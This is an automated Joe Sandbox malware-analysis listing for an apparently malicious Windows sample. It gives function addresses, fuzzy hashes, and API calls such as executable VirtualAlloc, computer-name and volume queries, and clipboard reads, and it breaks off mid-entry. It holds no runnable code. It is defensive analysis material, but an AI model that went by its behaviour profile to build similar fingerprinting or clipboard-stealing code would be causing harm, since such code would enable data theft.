Instruction Fuzzy Hash: 06D1C1B1A083219BD704CF18D89072BB7E1EFE5754F98496EE4858B391E739DD04CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00421090 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0fae915c2973b017a55c8055e8b591edaf4bb58aca64972c5d659872db0369
Instruction ID: 024c6bc1a7c06842b7b2da60ebc75b4e81c0e709c88b8f194da14b798eec8cba
Opcode Fuzzy Hash: 3f0fae915c2973b017a55c8055e8b591edaf4bb58aca64972c5d659872db0369
Instruction Fuzzy Hash: 13C145B4214B01CFD324CF25D894B27B7E1FB8A304F958A2DD5968BAA1D778F446CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0043B3B0 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044954b69dfcc1224b8e003c548a13639cb80c27a06fccdb66e24d4811525113
Instruction ID: cfd6409ae6c1319e473ca82dbec1d2571da19b56d0cb4a7f1dcbce60b372dc38
Opcode Fuzzy Hash: 044954b69dfcc1224b8e003c548a13639cb80c27a06fccdb66e24d4811525113
Instruction Fuzzy Hash: B781DD72A043019BD714CF18C890B6BB3A1FF88318F19991DE9959B392D334EC15CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0043AE80 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c21440910b441c3c47798c68511679ee4b192c036e3a23ecd466ca5ef6df7e
Instruction ID: 7ec337f4810fed5a0fc0c42e7f6c195b542c32b12575270dc2a29337bbab3055
Opcode Fuzzy Hash: 44c21440910b441c3c47798c68511679ee4b192c036e3a23ecd466ca5ef6df7e
Instruction Fuzzy Hash: 76519BB52483019BE718CF14C890B6FB7F1EB89748F24981DE5E59B391D378E815CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00438879 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a525d3b901aab37e805287b5fe7f45e91ed26bae2eb08f4b056ac6a42eabfecf
Instruction ID: e35f2d1fee80e2f1db852cb22d8b1dde2544e3ec87f29d33cf979d87121eb95b
Opcode Fuzzy Hash: a525d3b901aab37e805287b5fe7f45e91ed26bae2eb08f4b056ac6a42eabfecf
Instruction Fuzzy Hash: E64148B4210B008BD729CF15C890B27F7F2FF49315F589A1DD4968BA95CB78E4168B89

Uniqueness

Uniqueness Score: -1.00%

Function 00437998 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac606fa896dbfc20e0858d286959e527960311e6db785cbe9c751ee3dc681b9
Instruction ID: c35e6b3492bc7fc63c5e4d94200a91186c139317177be3ffd343f9b61624e557
Opcode Fuzzy Hash: 7ac606fa896dbfc20e0858d286959e527960311e6db785cbe9c751ee3dc681b9
Instruction Fuzzy Hash: 4E5156B0244B008FE3348F15C894B17B7F2EB49318F649A1DD4A29BB95C778F9058B88

Uniqueness

Uniqueness Score: -1.00%

Function 0041210C Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13eac76ea8d3fd39f0c83d84732ee0ae87b3b7a133187896b959945c85a3b65a
Instruction ID: ca850fd041728cb81bae71f088373bc471964c8ad35e0faae0c370fe9a2fbc17
Opcode Fuzzy Hash: 13eac76ea8d3fd39f0c83d84732ee0ae87b3b7a133187896b959945c85a3b65a
Instruction Fuzzy Hash: 5831B271A00B018FC725CF35C8817A7B7E2FB89314F188A2ED1AAC3791E778E4818B45

Uniqueness

Uniqueness Score: -1.00%

Function 00410565 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8646d0b6c90f403e1a8a630bed48f489923bff8176b96a56545a554dce1654f
Instruction ID: ea6735051b580764b1b091c7d8751f59caf218b0077db567d50405ba04e5f90f
Opcode Fuzzy Hash: a8646d0b6c90f403e1a8a630bed48f489923bff8176b96a56545a554dce1654f
Instruction Fuzzy Hash: 8CE092397006004BC658AB30D89267B736397C6300F0C143CD447A33A2CE78B8818A49

Uniqueness

Uniqueness Score: -1.00%

Function 004286B8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d40ba8103fe54fbe292f7b0286ae1ba72782342e545eadd221858701af8b18
Instruction ID: fb33a21c909e12981a6b8ef3dc275bf6d2761d5d6d7fe25341320a66258a9d40
Opcode Fuzzy Hash: a8d40ba8103fe54fbe292f7b0286ae1ba72782342e545eadd221858701af8b18
Instruction Fuzzy Hash: 1BF0AC745093408FC324DF25C55575ABBF0FB8D304F81892DD59A8B291D778A904CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0368003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0368024D

Strings

cess, xrefs: 0368018D
kernel32.dll, xrefs: 0368008F, 03680095

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: bcc6d3b164bba31253f78a5e7a2f88631263934e24587a7d11c328863e6e84a2
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 6D527AB4A01229DFDB64CF58C984BACBBB1BF09304F1485D9E54DAB351DB30AA89CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00427C0B Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00427D72

Strings

3, xrefs: 00427C3B
;, xrefs: 00427C8B
%, xrefs: 00427C7B
:, xrefs: 00427C4B
6, xrefs: 00427C9B
!, xrefs: 00427C6B

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocString
String ID: !$%$3$6$:$;
API String ID: 2525500382-3001093237
Opcode ID: 33183d01ceb5a524f0c18bbdcc2b8a0325e2adc34bd19612829b3e5eac2fea1f
Instruction ID: 1a39169d67010728743755bad08802f9e09bd0e4855d95ec92bb4768922a02a3
Opcode Fuzzy Hash: 33183d01ceb5a524f0c18bbdcc2b8a0325e2adc34bd19612829b3e5eac2fea1f
Instruction Fuzzy Hash: E641353010C7C58AD33ACA28C4997DFBFE25BD6314F084A5CE1E94A2C2C3B9464AC757

Uniqueness

Uniqueness Score: -1.00%

Function 0041E6A0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041E7CB
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041E7FA

Strings

N, xrefs: 0041E828
JE, xrefs: 0041E72B
mz, xrefs: 0041E820

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: JE$N$mz
API String ID: 237503144-108684729
Opcode ID: 03d5809357e3963816daa3459d23f7a23414702b53542c1c910962c249b0d0e7
Instruction ID: d4eb9d248d4042ffda66fec7adb5be2df31ff8f7ed8dd41437f0ba620aed1879
Opcode Fuzzy Hash: 03d5809357e3963816daa3459d23f7a23414702b53542c1c910962c249b0d0e7
Instruction Fuzzy Hash: BB5151B4108341AFD310CF02C895B4BBBE5EBC6754F108E1DF8A45B391D779D9858B96

Uniqueness

Uniqueness Score: -1.00%

Function 004248C4 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 610
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00424D2D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424E28

Strings

<VXp, xrefs: 0042498E

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ComputerName
String ID: <VXp
API String ID: 3545744682-3522128999
Opcode ID: ceb7df71cc771084bf12d3982bfc6851ab6c604ce51aaaf5532dc42f773fec6f
Instruction ID: 6299c964a3fce0bafc53ea5c8286f28257e6a63a241fb0224b927437de5add70
Opcode Fuzzy Hash: ceb7df71cc771084bf12d3982bfc6851ab6c604ce51aaaf5532dc42f773fec6f
Instruction Fuzzy Hash: DC32FE70204B918AE725CF34C8647E3BBE1EF57309F98495EC4EB9B282C7796446CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004248C7 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 602
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<VXp, xrefs: 0042498E

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: <VXp
API String ID: 0-3522128999
Opcode ID: aa472b181c25ef4c7ff1b41997715be3b6fc59769e2fc03377bffbd232bba362
Instruction ID: 39380498e3301fda940bb2c750f98dbafe3cac41602dcf564c309bbfc5931e86
Opcode Fuzzy Hash: aa472b181c25ef4c7ff1b41997715be3b6fc59769e2fc03377bffbd232bba362
Instruction Fuzzy Hash: C822FF70204B918AE725CF34C8647E3BBE1EF57305F98495EC4EB9B282C7796446CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004252A4 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

zrHu, xrefs: 00425BB0
(VDn, xrefs: 00425BA6

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: (VDn$zrHu
API String ID: 0-2980758696
Opcode ID: 379f5229f73699a554116ef83f101bc97f7cbfca640173dcc043b3cc4881a05d
Instruction ID: 6abb5f54dd02d2df8b74713aa4eba05006bae67069e8e73d66e3ac6d0c001b4f
Opcode Fuzzy Hash: 379f5229f73699a554116ef83f101bc97f7cbfca640173dcc043b3cc4881a05d
Instruction Fuzzy Hash: 67F18A70604F808BE726CF35C4A47E7BBE1AF56304F88495EC4EA9B792C779A406CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0042E3EF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SelectObject.GDI32 ref: 0042E437
SelectObject.GDI32 ref: 0042E4B9

Strings

, xrefs: 0042E486

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ObjectSelect
String ID:
API String ID: 1517587568-3916222277
Opcode ID: e0dffe2799290b1325598bf0a61f6d8834782f29a839223cc3ea3d362ac7b798
Instruction ID: 64c2dd33f56547eeba0a9756c00d89cd855ce22edeb25e2eb396533884e40186
Opcode Fuzzy Hash: e0dffe2799290b1325598bf0a61f6d8834782f29a839223cc3ea3d362ac7b798
Instruction Fuzzy Hash: 7D515CB8605B008FC364DF28D595A16BBF1FB89300F508A6DE98A8BB60D731F845CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00408DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 00408E60

Strings

often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 00408E26

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitProcess
String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
API String ID: 621844428-3137510881
Opcode ID: fa5aabe4ad16cf67e7d547b67a197814e7e1d1e69f37924dfa70f4ebd1137123
Instruction ID: 2fd8b006e3b76f4afec7b1faa4642abc4b02275d11bc394f33c7f760dc90e6d3
Opcode Fuzzy Hash: fa5aabe4ad16cf67e7d547b67a197814e7e1d1e69f37924dfa70f4ebd1137123
Instruction Fuzzy Hash: 8BF06D7040C601CAD600BB61C705269B7A06F14328F20593FE8CAE12C0DF3C8486AADF

Uniqueness

Uniqueness Score: -1.00%

Function 00437E48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 00437FA3

Strings

gRI, xrefs: 00437F00

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: gRI
API String ID: 1029625771-894747221
Opcode ID: b924395998ae65e34cc97e97e49c83ced36f9783127f8a86a70ad9b629d00132
Instruction ID: 2a4b3bc33ec7130f718fa133b8f83357076008803d7a7ff669a68a4f6503176c
Opcode Fuzzy Hash: b924395998ae65e34cc97e97e49c83ced36f9783127f8a86a70ad9b629d00132
Instruction Fuzzy Hash: 734118B41047428BD328CF29C590B13FBB1BF49304F189A9DD4928FB56C334E58ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 004241EB Relevance: 3.6, APIs: 2, Instructions: 582COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00424D2D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424E28

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: df82d550106a5831d78f12e269e3e0b91f16142a182fe8660f2375e7ed7413ff
Instruction ID: 15930a0e3456c2de96117bffaec9bf70862991a15f3db32a0408bad3ef46fb91
Opcode Fuzzy Hash: df82d550106a5831d78f12e269e3e0b91f16142a182fe8660f2375e7ed7413ff
Instruction Fuzzy Hash: DC22BD70204B918BE725CF34C8947E3BBE1AF56304F98495ED4EB9B782C779A406CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00435AA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00435B47

Strings

f543, xrefs: 00435B08

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID: f543
API String ID: 1279760036-424919641
Opcode ID: 6cbb3d75488a68f00f06e546b757858c8eccb469aa893b84ba7841f44e1abc9f
Instruction ID: 06c2186eef59e94b595ca09588689556934a3fe7b1df8413d19f3e3cff029a90
Opcode Fuzzy Hash: 6cbb3d75488a68f00f06e546b757858c8eccb469aa893b84ba7841f44e1abc9f
Instruction Fuzzy Hash: 3D1148741083019FD708CF14C464B6BBBA2EBC5328F248A1CE8A50B791C77AD915CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00439580 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00439617

Strings

f543, xrefs: 004395D8

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID: f543
API String ID: 1279760036-424919641
Opcode ID: fb90c4881631728a67103a90e4af625c91e24478a3ae189eab592f5653f933f2
Instruction ID: bcaec8aad2e54c7bb86e5c8c35838375d44d37fa2ceccc352b8ebc86a0d96e6b
Opcode Fuzzy Hash: fb90c4881631728a67103a90e4af625c91e24478a3ae189eab592f5653f933f2
Instruction Fuzzy Hash: 8A1109741083019FE708CF14C4A476BBBA2EBD5728F24895DE4A507691C7BAD919CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00433D05 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433D3A

Strings

\, xrefs: 00433D05

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InformationVolume
String ID: \
API String ID: 2039140958-2967466578
Opcode ID: 97d75a674a5be829cde8a03888e8111a6af89568cd531833de46cd4d18545e80
Instruction ID: 4293fc51c427d059e8a1900740c0d841a4927f035155755a6a86f4fc830b078c
Opcode Fuzzy Hash: 97d75a674a5be829cde8a03888e8111a6af89568cd531833de46cd4d18545e80
Instruction Fuzzy Hash: 7FE04F75285701BBF328CF10ED23F2A32A59B45B05F20442DB306EA1D1D7B4B915CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041DE00 Relevance: 3.2, APIs: 2, Instructions: 215COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041DF06
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041DF31

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 4429e528902b6959771bdd2832947410f763d0ee0b9aaf0d96c237b5a8ace8fb
Instruction ID: 7cd1955bb7ff4877b61add733c5008b9238defc5a30e4e77b50cb4d3de39835c
Opcode Fuzzy Hash: 4429e528902b6959771bdd2832947410f763d0ee0b9aaf0d96c237b5a8ace8fb
Instruction Fuzzy Hash: 21619D756083518FE324CF15C890BABB7E1EFCA318F014A1DE8D95B281D7789A46CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0042DFB8 Relevance: 3.1, APIs: 2, Instructions: 123COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042E066
GetSystemMetrics.USER32 ref: 0042E077

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 365337688-0
Opcode ID: a910ae7a2649babda8153f224d949615ec8b62e997d32fa7a6b3b09d989dad0e
Instruction ID: ec370dcdc0dee2e7242882cc56310c6ee9e1b245d348888234485e317814ae48
Opcode Fuzzy Hash: a910ae7a2649babda8153f224d949615ec8b62e997d32fa7a6b3b09d989dad0e
Instruction Fuzzy Hash: 0A515DB4A10B009FD364DF2DD981A26BBF5FB49704B10492DE98AC7B60D631F845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03680E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,03680223,?,?), ref: 03680E19
SetErrorMode.KERNELBASE(00000000,?,?,03680223,?,?), ref: 03680E1E

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 72ef8af79f50cd72626f8a866139c364297ceb20aa29a65e67ef4d2165fa9540
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 19D0123114512877D7003B94DC0DBCEBB1CDF09B62F048411FB0DD9180C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004394EC Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00439575

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bf3e3f96053bca1849cd9bffeedf92de85d467ab460f6b04e012a5cbc12d61f1
Instruction ID: 1d8b2ebf96d1ba174666c76c8533ac1a669530b6b8cb3b7a98fa5c82265e6ac1
Opcode Fuzzy Hash: bf3e3f96053bca1849cd9bffeedf92de85d467ab460f6b04e012a5cbc12d61f1
Instruction Fuzzy Hash: 7801D7701083409FE318CF10D464B6FFBE1EBC5728F209A1DE4A91B681C3B9D959CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041860C Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418638

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 8fbd10a75e567c23622f6f1f1af2b8b55c0af1b8ad70b396d9a66fe143293182
Instruction ID: eb8c1c7914f9d0c13229cf9ff11979a1d61f9c5fd9cbf3551faf471138ca6978
Opcode Fuzzy Hash: 8fbd10a75e567c23622f6f1f1af2b8b55c0af1b8ad70b396d9a66fe143293182
Instruction Fuzzy Hash: 1CF02EBA900200AFDA20DF25CC05E2337A8EB85324B00882DF26BC3291EB30E410DB04

Uniqueness

Uniqueness Score: -1.00%

Function 01A7025D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01A702AE

Memory Dump Source

Source File: 00000000.00000002.1890444980.0000000001A6F000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6f000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 41d70f1d632c52dcf9fe0b1625782b6c19cd71ec304c9b5cb10d5bd01efb438e
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: C2113C79A40208EFDB01DF98CA89E98BFF5AF09350F058094FA489B361D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042D8F0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 155clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 0042D94C
OpenClipboard.USER32 ref: 0042D95E
GetClipboardData.USER32 ref: 0042D97D
CloseClipboard.USER32 ref: 0042DAAF

Strings

b, xrefs: 0042D9ED
l, xrefs: 0042DA09
a, xrefs: 0042D9F5
c, xrefs: 0042DA05
c, xrefs: 0042D9E5
n, xrefs: 0042DA01

Memory Dump Source

